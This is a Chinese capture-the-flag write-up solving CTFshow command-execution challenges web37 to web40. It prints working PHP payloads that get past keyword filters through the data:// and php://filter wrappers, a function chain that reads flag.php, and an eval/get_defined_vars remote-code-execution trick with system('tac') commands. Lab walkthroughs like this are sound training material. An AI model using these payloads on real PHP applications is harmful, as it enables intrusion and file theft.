CTFshow 命令执行 web37-web40

目录

web37

方法一:php://input

方法二:data协议

web38

web39

web40

方法一:构造文件读取

方法二:构造数组+rce


web37

php 复制代码
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

过滤了flag字符,不区分大小写。

我们可以看到这里有include(c)函数,通过c变量,我们可以将想要执行的指令传入,如果要用到filter协议的话,payload可以构造如下:

?c=php://filter/read=convert.base64-encode/resource=flag.php

但是由于过滤规则,把flag过滤掉了,这里就不能使用filter协议了。

方法一:php://input

有多种方式来实现,最常见的是利用hacker插件,将想要传输的参数,以post的方式传输

也可以利用burpsuite来实现

方法二:data协议

php 复制代码
?c=data://text/plain,<?php system('tac f*');?>

也可以将要传入的的命令加密之后才传入,并指明加密的类型。如这里采用base64的加密方式,

php 复制代码
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZionKTs/Pg==

web38

php 复制代码
if(!preg_match("/flag|php|file/i", $c))

可以看到把,flag,php,file都过滤掉了,多了对php的过滤,于是就只能

php 复制代码
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZionKTs/Pg==

web39

php 复制代码
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}

include函数表示,在输入的参数c后面加上.php,解法同web38

php 复制代码
?c=data://text/plain,<?php system('tac f*');?>

web40

我们可以看到过滤了好多的符号,最重要的是单双引号,斜杠、逗号、以及$都过滤掉了,这意味着我们之前的哪些方法都用不了了。但是值得一提的是,这里过滤掉的是中文括号,英文括号并没有被过滤掉。

方法一:构造文件读取

于是这里我们要用到许多的函数:

localeconv():返回包含本地数字及货币信息格式的数组。其中数组中的第一个为点号(.)

pos():返回数组中的当前元素的值。current()与其相似。

scandir():获取目录下的文件。

array_reverse():数组逆序。

next():函数将内部指针指向数组中的下一个元素,并输出。

print_r():函数用于打印变量,作用对象是变量。

show_source():对文件进行 PHP 语法高亮显示。语法通过使用 HTML 标签进行高亮,作用对象是文件。

highlight_file():跟show_source()类似。

开始解题:

(1)首先我们看看localeconv()的返回值是什么:

localeconv() 函数返回的 lconv 结构体的内容。这个结构体包含了与区域设置(locale)相关的数值和字符串信息,用于货币和数字的格式化。

(2)再用pos或者current函数返回数组当前元素的值:

复制代码
?c=print_r(pos(localeconv()));

得到的是一个点:

(3)使用scandir('.')获得当前目录下的文件:

复制代码
?c=print_r(scandir(pos(localeconv())));

可以看到目录下的文件,有flag.php文件

(4)使用array_reverse将文件目录反转

复制代码
?c=print_r((array_reverse(scandir(current(localeconv())))));

(5)将反转后的目录使用next函数,将flag.php文件输出,值得注意的是,我们这里输出的对象是文件,前面用到的print_r函数输出的对象是参数,于是我们这里就只能用show_source或者highlight_file

于是我们可以构造payload:

复制代码
?c=show_source(next(array_reverse(scandir(current(localeconv())))));

得到flag

方法二:构造数组+rce

get_defined_vars() :函数返回由所有已定义变量所组成的数组。

打印当前所有变量:print_r(get_defined_vars());

array_pop() 函数删除数组中的最后一个元素。

拿到数组,再拿数组值,数组弹出并打印:print(array_pop(next(get_defined_vars())));

复制代码
payload:
eval(array_pop(next(get_defined_vars())));
post传参:1=system("tac fla?.php");

参考博客:ctfshow-web入门------命令执行(1)(web29-web40)_ctfshwo web入门命令执行-CSDN博客

相关推荐
ALe要立志成为web糕手20 分钟前
SESSION_UPLOAD_PROGRESS 的利用
python·web安全·网络安全·ctf
x-cmd5 小时前
[250331] Paozhu 发布 1.9.0:C++ Web 框架,比肩脚本语言 | DeaDBeeF 播放器发布 1.10.0
android·linux·开发语言·c++·web·音乐播放器·脚本语言
jingshaoyou6 小时前
Strongswan linked_list_t链表 注释可独立运行测试
数据结构·链表·网络安全·list
鹅肝手握高V五色8 小时前
Wireshark入门教程:如何抓取和过滤网络数据包
websocket·网络协议·tcp/ip·http·网络安全·https·udp
sszdlbw10 小时前
BUUCTF-web刷题篇(6)
web安全·web·buuctf
nixiaoge11 小时前
RCE漏洞
网络安全
禾木KG12 小时前
网络安全-等级保护(等保) 1-0 等级保护制度公安部前期发文总结
网络安全
网络抓包与爬虫12 小时前
Wireshark——抓包分析
websocket·网络协议·tcp/ip·http·网络安全·https·udp
仙女很美哦13 小时前
Flutter视频播放、Flutter VideoPlayer 视频播放组件精要
websocket·网络协议·tcp/ip·http·网络安全·https·udp
CYRUS STUDIO14 小时前
Unidbg Trace 反 OLLVM 控制流平坦化(fla)
android·汇编·算法·网络安全·逆向·ollvm